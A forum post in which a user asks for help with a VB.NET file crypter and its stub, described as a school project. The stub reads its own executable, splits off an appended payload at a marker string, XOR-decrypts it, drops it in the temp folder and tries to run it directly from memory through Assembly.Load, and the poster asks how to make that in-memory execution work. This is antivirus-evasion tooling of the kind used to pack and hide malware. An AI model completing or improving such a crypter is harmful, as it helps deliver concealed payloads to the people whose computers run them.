Loading executable into memory

[Rayko]

Alright, for a school project i'm making a filecrypter, and i need to load the executable directly into the memory.

For those that don't know it yet, a crypter consists of a crypter, and a seperate "stub"

the crypter crypts the file, and the stub is binded to the file, and upon execution, the stub is executed, and in turn executes the file it's bound to.

I have a RunPE sub, and on itself it works fine

Code:

Imports System.Runtime.CompilerServices
Imports System.Reflection

Public Class Form1

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim x As New Threading.Thread(AddressOf RunInternalExe)
        x.Start()
    End Sub
    Private Sub RunInternalExe()
        Dim CurrentAssembly As Reflection.Assembly = Reflection.Assembly.GetExecutingAssembly()
        Dim Resource As String = String.Empty
        Dim ArrResources As String() = CurrentAssembly.GetManifestResourceNames()
        For Each Resource In ArrResources
            If Resource.IndexOf("test.exe") > -1 Then Exit For
        Next
        Dim ResourceStream As IO.Stream = CurrentAssembly.GetManifestResourceStream(Resource)
        If ResourceStream Is Nothing Then
            Return
        End If
        Dim ResourcesBuffer(CInt(ResourceStream.Length) - 1) As Byte
        ResourceStream.Read(ResourcesBuffer, 0, ResourcesBuffer.Length)
        ResourceStream.Close()
        Dim assembly As Assembly = assembly.Load(ResourcesBuffer)
        Dim entryPoint As MethodInfo = [assembly].EntryPoint
        Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name))
        entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"1"}})

    End Sub
End Class

this code will successfully load "test.exe"

but when i apply it to my stub like this

Code:

Imports System.Runtime.CompilerServices
Imports System.Reflection

Public Class Form1
    Const filesplit = "-{@z3r0x@}-"
    Private Sub Form1_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
        On Error Resume Next
        Dim TPath As String = System.IO.Path.GetTempPath
        Dim file1, filezb4(), filezafter As String
        Dim x As New Threading.Thread(AddressOf RunPE)
        FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
        file1 = Space(FileLen(1))
        FileGet(1, file1)
        FileClose(1)
        filezb4 = Split(file1, filesplit)
        filezafter = xorcrypt(filezb4(1), "SomeKeyString")
        FileOpen(5, TPath & "\CryptedFile.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
        FilePut(5, filezafter)
        FileClose(5)
        x.Start(TPath & "\CryptedFile.exe")
        Me.Close()
        End
    End Sub

    Private Function xorcrypt(ByVal filein As String, ByVal key As String) As String
        Dim Index As Integer = 0
        Dim ReturnValue As String = ""
        For Each CharValue As Char In filein.ToCharArray
            ReturnValue = String.Concat(ReturnValue, Chr(Asc(CharValue) Xor Asc(key.Substring(Index, 1))))
            Index = (Index + 1) Mod key.Length
        Next
        Return ReturnValue
    End Function
    Private Sub RunPE(ByVal stuff As String)
        Dim CurrentAssembly As Reflection.Assembly = Reflection.Assembly.GetExecutingAssembly()
        Dim Resource As String = String.Empty
        Dim ArrResources As String() = CurrentAssembly.GetManifestResourceNames()
        For Each Resource In ArrResources
            If Resource.IndexOf(stuff) > -1 Then Exit For
        Next
        Dim ResourceStream As IO.Stream = CurrentAssembly.GetManifestResourceStream(Resource)
        If ResourceStream Is Nothing Then
            Return
        End If
        Dim ResourcesBuffer(CInt(ResourceStream.Length) - 1) As Byte
        ResourceStream.Read(ResourcesBuffer, 0, ResourcesBuffer.Length)
        ResourceStream.Close()
        Dim assembly As Assembly = assembly.Load(ResourcesBuffer)
        Dim entryPoint As MethodInfo = [assembly].EntryPoint
        Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name))
        entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"1"}})

    End Sub
End Class

^Doesn't load the file it's binded to^

Note also, if i leave out the RunPE, and just load the binded executable like this

Code:

System.Diagnostics.Process.Start(TPath & "\CryptedFile.exe")

it DOES work (but then it won't load it directly into the memory, ofcourse, which IS a requirement)

thanks in advance everyone!